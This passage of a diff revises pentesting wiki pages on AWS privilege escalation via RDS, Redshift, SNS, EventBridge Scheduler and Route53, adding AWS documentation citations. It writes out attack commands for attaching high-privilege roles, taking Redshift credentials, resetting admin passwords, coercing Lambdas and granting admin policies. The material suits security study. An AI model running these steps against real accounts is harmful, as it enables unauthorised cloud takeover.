+An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **associate a specified IAM role with an existing DB instance**. AWS requires the instance to be available, the feature to be supported by the engine, and `iam:PassRole` is a dependent permission for this action.<sup>[[14]](#references)[[17]](#references)</sup>
 
 > [!WARNING]
-> The DB instance must be outside of a cluster for this
+> For Aurora cluster integrations, use `AddRoleToDBCluster`; `AddRoleToDBInstance` requires an available DB instance and does not apply to RDS Custom.<sup>[[7]](#references)[[11]](#references)[[17]](#references)</sup>
 
 ```bash
 aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>
@@ -168,7 +190,9 @@ aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-
 
 ### `rds:CreateBlueGreenDeployment`, `rds:AddRoleToDBCluster`, `iam:PassRole`, `rds:SwitchoverBlueGreenDeployment`
 
-An attacker with these permissions can clone a production database (Blue), attach a high-privilege IAM role to the clone (Green), and then use switchover to replace the production environment. This allows the attacker to elevate the database's privileges and gain unauthorized access to other AWS resources.
+Blue/green deployment copies the production topology into a green environment, and switchover routes production traffic to green. AWS specifically recommends giving a green Aurora cluster access to S3 through an IAM role after creation so S3 commands continue functioning after switchover. Therefore, if the role is more privileged than intended, a principal able to create the deployment, associate the role, and switch over may abuse a database integration to reach other AWS services; the exact prerequisites depend on the source engine and policy dependencies.<sup>[[14]](#references)[[19]](#references)[[20]](#references)</sup>
+
+This path also requires database access and enough SQL privileges to invoke the configured integration; the listed control-plane permissions alone do not provide a database session.<sup>[[5]](#references)[[7]](#references)[[8]](#references)[[20]](#references)</sup>
 
 ```bash
 # Create a Green deployment (clone) of the production cluster
@@ -179,16 +203,39 @@ aws rds create-blue-green-deployment \
 # Attach a high-privilege IAM role to the Green cluster
 aws rds add-role-to-db-cluster \
     --db-cluster-identifier <green-cluster-id> \
-    --role-arn <high-privilege-iam-role-arn>
+    --role-arn <high-privilege-iam-role-arn> \
+    --feature-name <feature-name>
 
 # Switch the Green environment to Production
 aws rds switchover-blue-green-deployment \
     --blue-green-deployment-identifier <deployment-id>
 ```
-**Potential Impact**: Full takeover of the production database environment. After the switchover, the database operates with elevated privileges, allowing unauthorized access to other AWS services (e.g., S3, Lambda, Secrets Manager) from within the database.
+**Potential Impact**: If the role grants access through a supported database integration, the green database may access other AWS services (for example, S3 or Lambda, depending on the engine), and switchover routes production traffic to it. The previous blue environment is retained after switchover, so this is a conditional database/service-role takeover rather than an automatic full account takeover.<sup>[[5]](#references)[[11]](#references)[[20]](#references)[[21]](#references)[[22]](#references)</sup>
+
+## References
+
+- [1] [modify-db-instance — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/rds/modify-db-instance.html)
+- [2] [Settings for DB instances - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_CreateDBInstance.Settings.html)
+- [3] [Creating and using an IAM policy for IAM database access - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html)
+- [4] [Enabling and disabling IAM database authentication - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.Enabling.html)
+- [5] [Extensions supported for Amazon Aurora PostgreSQL - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraPostgreSQLReleaseNotes/AuroraPostgreSQL.Extensions.html)
+- [6] [Function reference - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_PostgreSQL.S3Import.Reference.html)
+- [7] [Setting up access to an Amazon S3 bucket - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_PostgreSQL.S3Import.AccessPermission.html)
+- [8] [Loading data into an Amazon Aurora MySQL DB cluster from text files in an Amazon S3 bucket - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/AuroraMySQL.Integrating.LoadFromS3.html)
+- [9] [Security with Amazon Aurora MySQL - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/AuroraMySQL.Security.html)
+- [10] [Saving data from an Amazon Aurora MySQL DB cluster into text files in an Amazon S3 bucket - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/AuroraMySQL.Integrating.SaveIntoS3.html)
+- [11] [Associating an IAM role with an Amazon Aurora MySQL DB cluster - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/AuroraMySQL.Integrating.Authorizing.IAM.AddRoleToDBCluster.html)
+- [12] [describe-db-clusters — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/rds/describe-db-clusters.html)
+- [13] [AddRoleToDBCluster - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_AddRoleToDBCluster.html)
+- [14] [Actions, resources, and condition keys for Amazon RDS - Identity and Access Management](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonrds.html)
+- [15] [create-db-instance — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)
+- [16] [Creating an Amazon Aurora DB cluster - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/Aurora.CreateInstance.html)
+- [17] [AddRoleToDBInstance - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_AddRoleToDBInstance.html)
+- [18] [Configuring a DB instance for Amazon RDS Custom for Oracle - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/custom-creating.html)
+- [19] [Creating a blue/green deployment in Amazon Aurora - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/blue-green-deployments-creating.html)
+- [20] [Best practices for Amazon Aurora blue/green deployments - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/blue-green-deployments-best-practices.html)
+- [21] [switchover-blue-green-deployment — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/rds/switchover-blue-green-deployment.html)
+- [22] [Switching a blue/green deployment in Amazon Aurora - Amazon Aurora](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/blue-green-deployments-switching.html)
+- [23] [Creating a database account using IAM authentication - Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.DBAccounts.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc/README.md
@@ -1,10 +1,8 @@
 # AWS - Redshift Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Redshift
 
-For more information about RDS check:
+For more information about Redshift enumeration check:
 
 {{#ref}}
 ../../aws-services/aws-redshift-enum.md
@@ -12,51 +10,50 @@ For more information about RDS check:
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
 
-With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
+`redshift:DescribeClusters` returns provisioned-cluster properties and, when no cluster identifier is supplied, returns all clusters; its response includes identifiers, endpoints, database usernames, and attached IAM roles. `redshift:GetClusterCredentials` returns a temporary database username and password, subject to the IAM policy and Redshift resource permissions required by the request.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
-# Get creds
-aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
-# Connect, even if the password is a base64 string, that is the password
-psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439
+# Replace postgres with an existing database user in the cluster.
+aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 --no-auto-create
+# Use the returned DbUser (IAM:postgres when AutoCreate is false) and enter DbPassword when prompted.
+psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:postgres" -d template1 -p 5439
 ```
 
-**Potential Impact:** Find sensitive info inside the databases.
+**Potential Impact:** Query data accessible to the selected database user.<sup>[[3]](#references)</sup>
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
 
-With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
-Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
+With these permissions you can enumerate clusters and request temporary database credentials. The returned database user is mapped one-to-one to the source IAM identity, and the calling identity must have an IAM policy that permits the required actions and resources.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
-# Get creds
+# Get temporary credentials.
 aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
-# Connect, even if the password is a base64 string, that is the password
+# Example role-mapped DbUser; use the value returned by the command for your identity.
 psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
 ```
 
-**Potential Impact:** Find sensitive info inside the databases.
+**Potential Impact:** Query data accessible to the IAM-mapped database user.<sup>[[4]](#references)</sup>
 
-### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
+### `redshift:DescribeClusters`, `redshift:ModifyCluster`
 
-It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
+`redshift:DescribeClusters` can help discover the target cluster, while `redshift:ModifyCluster` can set a new password for the cluster admin user. The change is applied asynchronously; `MasterUserPassword` cannot be used when Secrets Manager manages the cluster's admin password.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ```
-aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;
+aws redshift modify-cluster --cluster-identifier '<cluster-identifier>' --master-user-password '<master-password>'
 ```
 
-**Potential Impact:** Find sensitive info inside the databases.
+**Potential Impact:** Regain administrator access to the cluster and query its data; changing the password can disrupt legitimate access.<sup>[[5]](#references)</sup>
 
 ## Accessing External Services
 
 > [!WARNING]
-> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
+> To access the following resources, specify the IAM role to use. A Redshift cluster can have a list of attached IAM roles; provide a role ARN or use `default` for the cluster's default role.<sup>[[6]](#references)[[7]](#references)</sup>
 
-> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
+> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service-chaining-roles.html), Redshift allows role chaining when each role can assume the next one. Specify the chain as comma-separated role ARNs in one `iam_role` value without spaces: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`<sup>[[7]](#references)</sup>
 
 ### Lambdas
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
+As explained in [the `CREATE EXTERNAL FUNCTION` documentation](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), Redshift can create a scalar UDF backed by a Lambda function. The caller must be a superuser or have the `CREATE EXTERNAL FUNCTION` privilege, and the selected IAM role must authorize the Lambda access.<sup>[[6]](#references)[[8]](#references)</sup>
 
 ```sql
 CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
@@ -68,7 +65,7 @@ IAM_ROLE default;
 
 ### S3
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
+As explained in the [COPY from Amazon S3](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html) and [UNLOAD](https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html) documentation, Redshift can **read from and write to S3 buckets** using IAM-role or credentials-based authorization.<sup>[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```sql
 # Read
@@ -85,7 +82,7 @@ iam_role default;
 
 ### Dynamo
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
+As explained in [the DynamoDB loading documentation](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), Redshift's `COPY` command can **load data from a DynamoDB table** when the selected IAM role has the required table permissions.<sup>[[12]](#references)</sup>
 
 ```sql
 copy favoritemovies
@@ -94,17 +91,26 @@ iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
 ```
 
 > [!WARNING]
-> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
+> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.<sup>[[12]](#references)</sup>
 
 ### EMR
 
-Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
+See [Loading data from Amazon EMR](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) for the required setup and `COPY` example.<sup>[[13]](#references)</sup>
 
 ## References
 
-- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [1] [AWS API calls that return credentials](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [2] [DescribeClusters - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/APIReference/API_DescribeClusters.html)
+- [3] [get-cluster-credentials - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/redshift/get-cluster-credentials.html)
+- [4] [get-cluster-credentials-with-iam - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/redshift/get-cluster-credentials-with-iam.html)
+- [5] [modify-cluster - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/redshift/modify-cluster.html)
+- [6] [Authorizing Amazon Redshift to access AWS services on your behalf](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html)
+- [7] [Chaining IAM roles in Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service-chaining-roles.html)
+- [8] [CREATE EXTERNAL FUNCTION - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html)
+- [9] [Authorization parameters - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-authorization.html)
+- [10] [COPY from Amazon S3 - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html)
+- [11] [UNLOAD - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html)
+- [12] [Loading data from an Amazon DynamoDB table - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html)
+- [13] [Loading data from Amazon EMR - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - SNS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SNS
 
 For more information check:
@@ -12,7 +10,9 @@ For more information check:
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+An identity granted `sns:Publish` can publish messages to an SNS topic.<sup>[[1]](#references)</sup> If subscribers treat messages as commands or events, attacker-controlled messages may trigger unintended application behavior or consume resources.
+
+The AWS CLI syntax is documented for the `Publish` operation.<sup>[[2]](#references)</sup>
 
 ```bash
 aws sns publish --topic-arn <value> --message <value>
@@ -22,17 +22,21 @@ aws sns publish --topic-arn <value> --message <value>
 
 ### `sns:Subscribe`
 
-An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
+An identity granted `sns:Subscribe` can attach an endpoint to an SNS topic.<sup>[[1]](#references)</sup> Depending on the endpoint and account, an attacker-controlled subscriber may receive future messages; an AWS Lambda endpoint is invoked when messages are published to the topic.<sup>[[3]](#references)[[6]](#references)</sup>
+
+The AWS CLI syntax is documented for the `Subscribe` operation.<sup>[[3]](#references)</sup>
 
 ```bash
-aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
+aws sns subscribe --topic-arn <value> --protocol <value> --notification-endpoint <value>
 ```
 
 **Potential Impact**: Unauthorized access to messages (sensitive info), service disruption for applications relying on the affected topic.
 
 ### `sns:AddPermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
+An identity granted `sns:AddPermission` can add a statement to a topic's access-control policy granting selected AWS accounts specified SNS actions.<sup>[[1]](#references)[[4]](#references)</sup> Misuse can grant unauthorized topic access or enable topic manipulation by the principals named in the new statement.
+
+The AWS CLI syntax is documented for the `AddPermission` operation.<sup>[[4]](#references)</sup>
 
 ```bash
 aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
@@ -43,13 +47,12 @@ aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <val
 
 ### Invoke a Lambda by abusing wildcard SNS permission (no `SourceArn`)
 
-If a Lambda function resource-based policy allows `sns.amazonaws.com` to invoke it without restricting the source topic (`SourceArn`), any SNS topic (even in another account) can subscribe and trigger the function. An attacker with basic SNS permissions can coerce the Lambda to execute under its IAM role with attacker-controlled input.
+If a Lambda function resource-based policy allows `sns.amazonaws.com` to invoke it without restricting the source topic (`SourceArn`), Lambda does not restrict which SNS topic triggers the invocation. AWS warns that, without a source restriction, other accounts could configure resources in their accounts to invoke the function.<sup>[[5]](#references)</sup> An attacker with the permissions needed to create or use a topic and establish the subscription can then publish attacker-controlled input, causing the Lambda to process it under its execution role.<sup>[[6]](#references)[[7]](#references)</sup>
 
 > [!TIP]
-> TODO: Can this really be done cross-account?
+> Cross-account SNS-to-Lambda subscriptions are supported, but they require the extra topic/account permissions described by AWS: the topic owner must permit the function account to subscribe, and the authorized principal in the function account creates the subscription. The Lambda resource-based policy must also allow SNS to invoke the function.<sup>[[6]](#references)[[8]](#references)</sup>
 
-Preconditions
-- Victim Lambda policy contains a statement like below, with NO `SourceArn` condition:
+Preconditions: the victim Lambda resource-based policy contains a statement like the following, with no `Condition`/`SourceArn` restriction.<sup>[[5]](#references)</sup>
 
 ```json
 {
@@ -58,14 +61,19 @@ Preconditions
     {
       "Effect": "Allow",
       "Principal": {"Service": "sns.amazonaws.com"},
-      "Action": "lambda:InvokeFunction"
-      // No Condition/SourceArn restriction here
+      "Action": "lambda:InvokeFunction",
+      "Resource": "arn:aws:lambda:us-east-1:<victim_acct_id>:function:<VictimFunctionName>"
     }
   ]
 }
 ```
 
 Abuse steps (same or cross-account)
+
+The commands below show a same-account flow. For a cross-account topic, create the subscription with the authorized principal in the function account after granting the required topic-policy permission.<sup>[[6]](#references)[[8]](#references)</sup>
+
+The sequence uses the documented SNS `CreateTopic`, `Subscribe`, and `Publish` CLI operations.<sup>[[2]](#references)[[3]](#references)[[9]](#references)</sup>
+
 ```bash
 # 1) Create a topic you control
 ATTACKER_TOPIC_ARN=$(aws sns create-topic --name attacker-coerce --region us-east-1 --query TopicArn --output text)
@@ -84,7 +92,20 @@ aws sns publish \
   --message '{"Records":[{"eventSource":"aws:s3","eventName":"ObjectCreated:Put","s3":{"bucket":{"name":"attacker-bkt"},"object":{"key":"payload.bin"}}}]}'
 ```
 
-**Potential Impact**: The victim Lambda executes with its IAM role, processing attacker-controlled input. This can be abused to make the function perform sensitive actions (e.g., write to S3, access secrets, modify resources) depending on its permissions.
+The `--message` value is attacker-controlled; SNS delivers it inside the standard SNS Lambda event envelope rather than as a raw S3 event.<sup>[[6]](#references)</sup>
 
+**Potential Impact**: The victim Lambda executes with its execution role and processes attacker-controlled SNS data. Depending on that role and the function's behavior, this can lead to sensitive actions such as writing to S3, accessing secrets, or modifying resources.<sup>[[6]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [Amazon SNS API permissions: Actions and resources reference](https://docs.aws.amazon.com/sns/latest/dg/sns-access-policy-language-api-permissions-reference.html)
+- [2] [publish — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/publish.html)
+- [3] [subscribe — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html)
+- [4] [add-permission — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/add-permission.html)
+- [5] [AddPermission — AWS Lambda API Reference](https://docs.aws.amazon.com/lambda/latest/api/API_AddPermission.html)
+- [6] [Invoking Lambda functions with Amazon SNS notifications](https://docs.aws.amazon.com/lambda/latest/dg/with-sns.html)
+- [7] [Defining Lambda function permissions with an execution role](https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html)
+- [8] [Tutorial: Using AWS Lambda with Amazon Simple Notification Service](https://docs.aws.amazon.com/lambda/latest/dg/with-sns-example.html)
+- [9] [create-topic — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/create-topic.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - EventBridge Scheduler Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EventBridge Scheduler
 
 More info EventBridge Scheduler in:
@@ -12,9 +10,9 @@ More info EventBridge Scheduler in:
 
 ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
 
-An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action
+An attacker with `iam:PassRole` and either `scheduler:CreateSchedule` or `scheduler:UpdateSchedule` can **create or update a schedule and cause EventBridge Scheduler to assume a chosen execution role**, allowing the schedule to perform actions permitted by that role.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
-For example, they could configure the schedule to **invoke a Lambda function** which is a templated action:
+For example, they could configure the schedule to **invoke a Lambda function**, a templated target.<sup>[[1]](#references)</sup>
 
 ```bash
 aws scheduler create-schedule \
@@ -27,7 +25,7 @@ aws scheduler create-schedule \
     }'
 ```
 
-In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy:
+In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke a broad set of supported API operations. One example is using a universal target to call `iam:PutRolePolicy` and add an inline "**AdminAccessPolicy**" to `TargetRole`, using an execution role authorized for that API operation.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ```bash
 aws scheduler create-schedule \
@@ -43,11 +41,13 @@ aws scheduler create-schedule \
 
 ## References
 
-- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
-- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
+- [1] [Using templated targets in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
+- [2] [Using universal targets in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
+- [3] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [4] [CreateSchedule](https://docs.aws.amazon.com/scheduler/latest/APIReference/API_CreateSchedule.html)
+- [5] [UpdateSchedule](https://docs.aws.amazon.com/scheduler/latest/APIReference/API_UpdateSchedule.html)
+- [6] [PutRolePolicy](https://docs.aws.amazon.com/IAM/latest/APIReference/API_PutRolePolicy.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer/README.md
@@ -1,35 +1,41 @@
 # AWS - Route53 Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 For more information about Route53 check:
 
 {{#ref}}
 ../../aws-services/aws-route53-enum.md
 {{#endref}}
 
-### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`
+### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`, `ec2:DescribeVpcs`
 
 > [!NOTE]
-> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.
+> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.<sup>[[1]](#references)[[3]](#references)</sup>
 
-Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
+Other permissions **recommended but not required for the enumeration** part are `route53:GetHostedZone`, `route53:ListHostedZones`, and `acm-pca:ListCertificateAuthorities`. AWS documents `ec2:DescribeVpcs` as required by `CreateHostedZone`, so it is included in the practical attack permissions above even though the original research listed it as enumeration-only.<sup>[[3]](#references)[[4]](#references)</sup>
 
-Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions.
+In a VPC where workloads trust an ACM Private CA, an adversary who can both alter private Route 53 resolution and issue certificates from that CA may be able to redirect an AWS service hostname to an attacker-controlled TLS endpoint. A vulnerable client that accepts the issued certificate could then disclose requests or credentials to the endpoint; the exact impact depends on the client, target API, and credential transport.<sup>[[3]](#references)</sup>
 
 This is possible because:
 
-- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
-- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names
-- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names
+- The original research reported that the tested AWS SDK path did not use certificate pinning; [certificate pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) is a client-side restriction on which certificates a connection accepts.<sup>[[2]](#references)[[3]](#references)</sup>
+- Route 53 private hosted zones can define records for a domain and its subdomains inside associated VPCs, and the original research demonstrated a record for `secretsmanager.us-east-1.amazonaws.com` pointing to an internal address.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
+- AWS Private CA's IAM reference exposes `acm-pca:TemplateArn` as the issuance-specific condition key, while passthrough templates can copy Subject/SAN values from an API/CSR. The original research concluded that this does not restrict `IssueCertificate` to specific Common Names by itself.<sup>[[3]](#references)[[7]](#references)[[8]](#references)</sup>
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.<sup>[[3]](#references)</sup>
 
 #### Exploitation <a href="#discovery" id="discovery"></a>
 
-Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
+Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/).<sup>[[3]](#references)</sup>
+
+## References
+
+- [1] [AWS Private Certificate Authority](https://aws.amazon.com/certificate-manager/private-certificate-authority/)
+- [2] [Stop Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
+- [3] [Hijacking AWS API calls](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
